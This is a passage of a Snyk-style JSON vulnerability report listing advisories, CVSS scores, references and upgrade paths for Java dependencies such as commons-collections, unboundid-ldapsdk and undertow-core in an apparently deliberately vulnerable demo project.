By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - 
"commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMUNBOUNDID-32143", - "title": "User Impersonation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,4.0.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.0.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[,4.0.5)" - ], - "functionId": { - "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java", - "className": "SimpleBindRequest", - "functionName": "process" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.unboundid:unboundid-ldapsdk", - "references": [ - { - "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6", - "title": "GitHub Commit" - }, - { - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134", - "title": "NVD" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:19.854962Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7, - "modificationTime": "2024-03-11T09:49:40.956024Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:05.592817Z" - 
}, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:19.854962Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:40.956024Z" - } - ], - "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)", - "epssDetails": { - "percentile": "0.80907", - "probability": "0.00729", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000134" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "com.unboundid:unboundid-ldapsdk", - "proprietary": false, - "creationTime": "2018-03-16T00:00:00Z", - "functions_new": [ - { - "version": [ - "[,4.0.5)" - ], - "functionId": { - "className": "com.unboundid.ldap.sdk.SimpleBindRequest", - "functionName": "process" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-03-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", 
- "mavenModuleName": { - "groupId": "com.unboundid", - "artifactId": "unboundid-ldapsdk" - }, - "publicationTime": "2018-04-01T14:18:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:40.956024Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "com.unboundid:unboundid-ldapsdk@3.1.1" - ], - "upgradePath": [ - false, - "com.unboundid:unboundid-ldapsdk@4.0.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.unboundid:unboundid-ldapsdk", - "version": "3.1.1" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-2391283", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.15.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.15.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8", - "title": "Github Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010378", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:50.428787Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:48.070223Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-06T13:57:10.356697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:50.428787Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.070223Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) which would cause client side invocation timeout with certain calls made over HTTP2.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.15.Final or higher.\n## References\n- [Github Commit](https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2010378)\n", - "epssDetails": { - "percentile": "0.78402", - "probability": "0.00590", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-3859" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-02-02T11:20:49.957629Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-02-01T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-02-09T17:20:22.376852Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.070223Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.15.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-2871356", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - 
"[,2.2.19.Final)", - "[2.3.0.Alpha1,2.3.0.Alpha2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.19.Final", - "2.3.0.Alpha2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1350", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095862", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2133", - "title": "Undertow Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:53.809517Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.519226Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:09.755888Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:53.809517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - 
"severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.519226Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when a `POST` request comes through `AJP` and the request exceeds the `max-post-size` limit (`maxEntitySize`). The `AjpServerRequestConduit` implementation closes a connection without sending any response to the `client/proxy` which will result in a front-end proxy marking the backend worker as an error state and not forward requests to the worker for a while.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.19.Final, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748)\n- [GitHub Commit](https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1350)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2095862)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2133)\n", - "epssDetails": { - "percentile": "0.36318", - "probability": "0.00084", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-2053" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-06-15T13:53:50.957525Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-06-14T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-06-15T15:07:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.519226Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.19.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3012383", - "title": "Denial of Service (DoS)", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.18)", - "[2.3.0.Alpha1,2.3.0.Alpha2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.18", - "2.3.0.Alpha2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1331", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073890", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2060", - "title": "Red Hat Issues" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:01.171825Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.199026Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:56.623925Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.171825Z" - }, - { - "type": "secondary", - 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.199026Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via an AJP 400 response, when EAP 7 is improperly sending two response packets, those packets have the reuse flag set even though JBoss EAP closes the connection. A failure occurs when the connection is reused after a 400 by `CPING` since it reads in the second `SEND_HEADERS` response packet instead of a `CPONG`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.18, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1331)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2073890)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2060)\n", - "epssDetails": { - "percentile": "0.71500", - "probability": "0.00335", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-1319" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-08-31T17:18:28.761846Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-08-31T17:13:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-08-31T17:18:28Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.199026Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.18.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3339519", - "title": "Improper Certificate Validation", - "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.24.Final)", - "[2.3.0.Alpha1,2.3.5.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.24.Final", - "2.3.5.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153260", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2022-4492", - "title": "RedHat CVE Database" - }, - { - "url": "https://issues.redhat.com/browse/MTA-93", - "title": "RedHat Issues" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:58.198807Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.706455Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:39.172740Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:58.198807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.706455Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Certificate Validation via the undertow client which does not check the server identity presented by the server certificate in https connections.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.24.Final, 2.3.5.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2153260)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2022-4492)\n- [RedHat Issues](https://issues.redhat.com/browse/MTA-93)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java)\n", - "epssDetails": { - "percentile": "0.35043", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-4492" - ], - "CWE": [ - "CWE-295" - ], - "GHSA": [ - "GHSA-pfcc-3g6r-8rg8" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2023-03-05T09:49:05.782717Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-02-23T21:30:16Z", - "exploitDetails": { - 
"sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2023-03-05T09:49:05.974241Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.706455Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.24.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3358786", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.25.Final)", - "[2.3.0.Alpha1,2.3.6.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.25.Final", - "2.3.6.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1477", - "title": "GitHub PR" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2137", - "title": "Undertow Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:01.060024Z" - }, - { - "assigner": "Red Hat", - 
